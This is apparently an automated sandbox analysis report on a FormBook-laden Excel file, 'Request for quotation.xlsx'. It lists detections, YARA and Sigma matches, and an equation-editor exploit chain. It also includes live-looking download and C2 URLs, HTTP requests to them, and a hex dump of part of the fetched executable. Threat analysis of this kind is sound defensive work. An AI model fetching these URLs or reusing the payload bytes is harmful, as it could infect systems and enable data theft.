Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Request for quotation.xlsx

Overview

General Information

Sample Name:Request for quotation.xlsx
Analysis ID:321122
MD5:109bae1300099a20ad3df28d09095bf1
SHA1:dd2c886624df876a75389a5690cf55fd59a0b217
SHA256:1154f054c7344a07eed067053d6f3cfec18bc3aee5078e94c3a77bba3827bb06
Tags:FormbookVelvetSweatshopxlsx

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2268 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • EQNEDT32.EXE (PID: 2412 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2924 cmdline: 'C:\Users\Public\vbc.exe' MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3024 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 3020 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
      • vbc.exe (PID: 2948 cmdline: C:\Users\Public\vbc.exe MD5: 221E46C09EB3440BEB5A2256211C3262)
        • explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2232 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
            • cmd.exe (PID: 2224 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 17 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      7.2.vbc.exe.400000.2.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        7.2.vbc.exe.400000.2.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.vbc.exe.400000.2.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        7.2.vbc.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          7.2.vbc.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.141.138.87, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2412, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2412, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
          Sigma detected: Executables Started in Suspicious FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: Execution in Non-Executable FolderShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924
          Sigma detected: Suspicious Program Location Process StartsShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2412, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2924

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://thdyneverwalkachinese2loneinlifekthfnp.ydns.eu/chnsfrnd2/winlog.exeAvira URL Cloud: Label: malware
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeAvira: detection malicious, Label: TR/AD.Swotter.yiimo
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeAvira: detection malicious, Label: TR/AD.Swotter.yiimo
          Multi AV Scanner detection for domain / URLShow sources
          Source: thdyneverwalkachinese2loneinlifekthfnp.ydns.euVirustotal: Detection: 7%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeReversingLabs: Detection: 33%
          Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 33%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Request for quotation.xlsxVirustotal: Detection: 33%Perma Link
          Source: Request for quotation.xlsxReversingLabs: Detection: 22%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJoe Sandbox ML: detected
          Source: 7.2.vbc.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A556E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A552E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A56BF0C FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A55BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_4A570492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then mov edi, edi
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4x nop then pop edi
          Source: global trafficDNS query: name: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.141.138.87:80
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Nov 2020 10:27:54 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Thu, 19 Nov 2020 20:54:09 GMTETag: "eb000-5b47bede9f95e"Accept-Ranges: bytesContent-Length: 962560Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 db b6 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 2e 0c 00 00 80 02 00 00 00 00 00 ee 4c 0c 00 00 20 00 00 00 60 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0f 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 4c 0c 00 4b 00 00 00 00 60 0c 00 b4 7d 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 2c 0c 00 00 20 00 00 00 2e 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b4 7d 02 00 00 60 0c 00 00 7e 02 00 00 30 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0e 00 00 02 00 00 00 ae 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 4c 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 52 00 00 3c 40 00 00 03 00 00 00 f4 00 00 06 0c 93 00 00 89 b9 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 3f 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 18 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 2a 02 28 04 00 00 06 20 00 00 00 00 16 3a e0 ff ff ff 26 20 00 00 00 00 38 d5 ff ff ff 00 13 30 03 00 4d 00 00 00 02 00 00 11 20 01 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 02 00 00 00 22 00 00 00 05 00 00 00 38 1d 00 00 00 73 22 00 00 06 13 00 20 00 00 00 00 28 05 00 00 06 3a d8 ff ff ff 26 38 ce ff ff ff 2a 11 00 6f 19 00 00 06 38 f3 ff ff ff 00 00 00 13 30 03 00 b1 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 05 00 00 00 65 00 00 00 45 00 00 00 25 00 00 00 64 00 00 00 05 00 00 00 38 60 00 00 00 02 7b 01 00 00 04 28 07 00 00 06 20 00 00 00 00 28 05 00 00 06 3a c8 ff ff ff 26 38 be ff ff ff 03 39 3a 00 00 00 20 01 00 00 00 28 05 00 00 06 3a ad ff ff ff 26 20 01 00 00 00 38 a2 ff ff ff 02 7b 01 0
          Source: global trafficHTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exeJump to behavior
          Source: global trafficHTTP traffic detected: GET /chnsfrnd2/winlog.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thdyneverwalkachinese2loneinlifekthfnp.ydns.euConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ogg/?tB=RFlQYLrZdnT7pMnfFMeIQbGHDdniJp1JjixjIr26XgGQhDWG8PiH1Erj4JEp2RyyMZp0Iw==&mbC0J=WL3hLJ98 HTTP/1.1Host: www.segredosdocopywriting.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: thdyneverwalkachinese2loneinlifekthfnp.ydns.eu
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000008.00000000.2258936880.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2269940837.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2260895982.0000000007FF0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.2252341374.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000008.00000000.2258237917.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000008.00000000.2265797693.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
